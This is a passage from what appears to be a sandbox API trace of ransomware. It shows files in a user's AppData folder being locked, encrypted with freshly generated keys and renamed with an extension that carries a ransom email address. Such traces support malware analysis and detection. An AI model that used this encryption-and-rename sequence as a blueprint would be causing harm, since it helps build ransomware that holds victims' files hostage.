Flags=0x8, Size=0x100) returned 0x4d8e98 [0129.253] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0129.253] WriteFile (in: hFile=0x524, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0129.256] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0129.257] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0129.258] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd221) returned 0xf70048 [0129.259] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd221) returned 0xf7d278 [0129.259] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.259] ReadFile (in: hFile=0x524, lpBuffer=0xf70048, nNumberOfBytesToRead=0xd221, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf70048*, lpNumberOfBytesRead=0x367f44c*=0xd221, lpOverlapped=0x0) returned 1 [0129.261] UnlockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xd221, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0129.261] CloseHandle (hObject=0x524) returned 1 [0129.262] GetProcessHeap () returned 0x410000 [0129.262] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0129.262] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jzVD7OtKGP_NsZrv.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\jzvd7otkgp_nszrv.avi"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jzVD7OtKGP_NsZrv.avi.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\jzvd7otkgp_nszrv.avi.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0129.266] GetProcessHeap () returned 0x410000 [0129.266] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x431d68 | out: hHeap=0x410000) returned 1 [0129.266] FindNextFileW (in: hFindFile=0x4e0e40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9a9c0fd0, ftCreationTime.dwHighDateTime=0x1d5ddac, ftLastAccessTime.dwLowDateTime=0x6544d9f0, ftLastAccessTime.dwHighDateTime=0x1d5e5b5, ftLastWriteTime.dwLowDateTime=0x6544d9f0, ftLastWriteTime.dwHighDateTime=0x1d5e5b5, nFileSizeHigh=0x0, nFileSizeLow=0x6190, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="k63rnxm5nV.bmp", cAlternateFileName="K63RNX~1.BMP")) returned 1 [0129.266] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\k63rnxm5nV.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\k63rnxm5nv.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x524 [0129.266] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0129.266] LockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x6190, nNumberOfBytesToLockHigh=0x0) returned 1 [0129.266] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.266] ReadFile (in: hFile=0x524, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0129.267] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.267] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.267] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0129.267] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0129.267] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\k63rnxm5nV.bmp", dwFileAttributes=0x80) returned 1 [0129.267] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\k63rnxm5nV.bmp") returned 61 [0129.267] GetProcessHeap () returned 0x410000 [0129.267] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xea) returned 0x431d68 [0129.267] lstrcpyW (in: lpString1=0x431d68, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\k63rnxm5nV.bmp" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\k63rnxm5nV.bmp") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\k63rnxm5nV.bmp" [0129.267] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\k63rnxm5nV.bmp", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\k63rnxm5nV.bmp.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\k63rnxm5nV.bmp.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0129.267] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=24976) returned 1 [0129.268] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x6190 [0129.268] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0129.268] GetProcessHeap () returned 0x410000 [0129.268] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0129.268] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0129.268] WriteFile (in: hFile=0x524, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0129.269] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0129.270] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0129.271] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x6190) returned 0x4e1b68 [0129.271] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x6190) returned 0xf70048 [0129.272] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.272] ReadFile (in: hFile=0x524, lpBuffer=0x4e1b68, nNumberOfBytesToRead=0x6190, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e1b68*, lpNumberOfBytesRead=0x367f44c*=0x6190, lpOverlapped=0x0) returned 1 [0129.274] UnlockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x6190, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0129.274] CloseHandle (hObject=0x524) returned 1 [0129.275] GetProcessHeap () returned 0x410000 [0129.275] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0129.275] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\k63rnxm5nV.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\k63rnxm5nv.bmp"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\k63rnxm5nV.bmp.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\k63rnxm5nv.bmp.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0129.278] GetProcessHeap () returned 0x410000 [0129.278] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x431d68 | out: hHeap=0x410000) returned 1 [0129.278] FindNextFileW (in: hFindFile=0x4e0e40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7c957450, ftCreationTime.dwHighDateTime=0x1d5e81e, ftLastAccessTime.dwLowDateTime=0xb1f48e60, ftLastAccessTime.dwHighDateTime=0x1d5e3c3, ftLastWriteTime.dwLowDateTime=0xb1f48e60, ftLastWriteTime.dwHighDateTime=0x1d5e3c3, nFileSizeHigh=0x0, nFileSizeLow=0x1248, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kpo62r tnSjAlV6nnX7.odp", cAlternateFileName="KPO62R~1.ODP")) returned 1 [0129.278] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\kpo62r tnSjAlV6nnX7.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\kpo62r tnsjalv6nnx7.odp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x524 [0129.278] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0129.278] LockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1248, nNumberOfBytesToLockHigh=0x0) returned 1 [0129.278] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.278] ReadFile (in: hFile=0x524, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0129.279] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.279] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.279] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0129.279] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0129.279] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\kpo62r tnSjAlV6nnX7.odp", dwFileAttributes=0x80) returned 1 [0129.279] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\kpo62r tnSjAlV6nnX7.odp") returned 70 [0129.279] GetProcessHeap () returned 0x410000 [0129.279] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xfc) returned 0x4d8e98 [0129.279] lstrcpyW (in: lpString1=0x4d8e98, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\kpo62r tnSjAlV6nnX7.odp" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\kpo62r tnSjAlV6nnX7.odp") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\kpo62r tnSjAlV6nnX7.odp" [0129.279] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\kpo62r tnSjAlV6nnX7.odp", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\kpo62r tnSjAlV6nnX7.odp.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\kpo62r tnSjAlV6nnX7.odp.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0129.280] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=4680) returned 1 [0129.280] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x1248 [0129.280] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0129.280] GetProcessHeap () returned 0x410000 [0129.280] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8fa0 [0129.280] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8fa0*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8fa0*, pdwDataLen=0x367f414*=0x100) returned 1 [0129.280] WriteFile (in: hFile=0x524, lpBuffer=0x4d8fa0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8fa0*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0129.281] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0129.282] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0129.283] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1248) returned 0x4e1b68 [0129.283] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1248) returned 0x4e2db8 [0129.283] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.283] ReadFile (in: hFile=0x524, lpBuffer=0x4e1b68, nNumberOfBytesToRead=0x1248, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e1b68*, lpNumberOfBytesRead=0x367f44c*=0x1248, lpOverlapped=0x0) returned 1 [0129.285] UnlockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1248, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0129.285] CloseHandle (hObject=0x524) returned 1 [0129.285] GetProcessHeap () returned 0x410000 [0129.285] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8fa0 | out: hHeap=0x410000) returned 1 [0129.285] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\kpo62r tnSjAlV6nnX7.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\kpo62r tnsjalv6nnx7.odp"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\kpo62r tnSjAlV6nnX7.odp.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\kpo62r tnsjalv6nnx7.odp.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0129.287] GetProcessHeap () returned 0x410000 [0129.288] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0129.288] FindNextFileW (in: hFindFile=0x4e0e40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x451710f0, ftCreationTime.dwHighDateTime=0x1d5e13a, ftLastAccessTime.dwLowDateTime=0xbcfba240, ftLastAccessTime.dwHighDateTime=0x1d5decc, ftLastWriteTime.dwLowDateTime=0xbcfba240, ftLastWriteTime.dwHighDateTime=0x1d5decc, nFileSizeHigh=0x0, nFileSizeLow=0x10720, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kXq.pptx", cAlternateFileName="KXQ~1.PPT")) returned 1 [0129.288] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\kXq.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\kxq.pptx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x524 [0129.288] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0129.288] LockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10720, nNumberOfBytesToLockHigh=0x0) returned 1 [0129.288] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.288] ReadFile (in: hFile=0x524, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0129.289] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.289] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.289] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0129.289] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0129.289] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\kXq.pptx", dwFileAttributes=0x80) returned 1 [0129.289] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\kXq.pptx") returned 55 [0129.289] GetProcessHeap () returned 0x410000 [0129.289] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xde) returned 0x461440 [0129.289] lstrcpyW (in: lpString1=0x461440, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\kXq.pptx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\kXq.pptx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\kXq.pptx" [0129.289] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\kXq.pptx", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\kXq.pptx.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\kXq.pptx.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0129.289] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=67360) returned 1 [0129.289] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x10720 [0129.289] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0129.290] GetProcessHeap () returned 0x410000 [0129.290] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0129.290] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0129.290] WriteFile (in: hFile=0x524, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0129.291] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0129.292] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0129.293] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10720) returned 0xf70048 [0129.294] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10720) returned 0xf80770 [0129.294] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.294] ReadFile (in: hFile=0x524, lpBuffer=0xf70048, nNumberOfBytesToRead=0x10720, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf70048*, lpNumberOfBytesRead=0x367f44c*=0x10720, lpOverlapped=0x0) returned 1 [0129.297] UnlockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10720, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0129.297] CloseHandle (hObject=0x524) returned 1 [0129.298] GetProcessHeap () returned 0x410000 [0129.298] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0129.298] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\kXq.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\kxq.pptx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\kXq.pptx.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\kxq.pptx.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0129.301] GetProcessHeap () returned 0x410000 [0129.301] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461440 | out: hHeap=0x410000) returned 1 [0129.301] FindNextFileW (in: hFindFile=0x4e0e40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5b6d0640, ftCreationTime.dwHighDateTime=0x1d5e796, ftLastAccessTime.dwLowDateTime=0xe6fdd420, ftLastAccessTime.dwHighDateTime=0x1d5e285, ftLastWriteTime.dwLowDateTime=0xe6fdd420, ftLastWriteTime.dwHighDateTime=0x1d5e285, nFileSizeHigh=0x0, nFileSizeLow=0x11f0f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LS2e_78ok.wav", cAlternateFileName="LS2E_7~1.WAV")) returned 1 [0129.301] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\LS2e_78ok.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ls2e_78ok.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x524 [0129.301] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0129.302] LockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x11f0f, nNumberOfBytesToLockHigh=0x0) returned 1 [0129.302] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.302] ReadFile (in: hFile=0x524, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0129.302] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.303] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.303] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0129.303] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0129.303] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\LS2e_78ok.wav", dwFileAttributes=0x80) returned 1 [0129.303] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\LS2e_78ok.wav") returned 60 [0129.303] GetProcessHeap () returned 0x410000 [0129.303] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe8) returned 0x467908 [0129.303] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\LS2e_78ok.wav" | out: 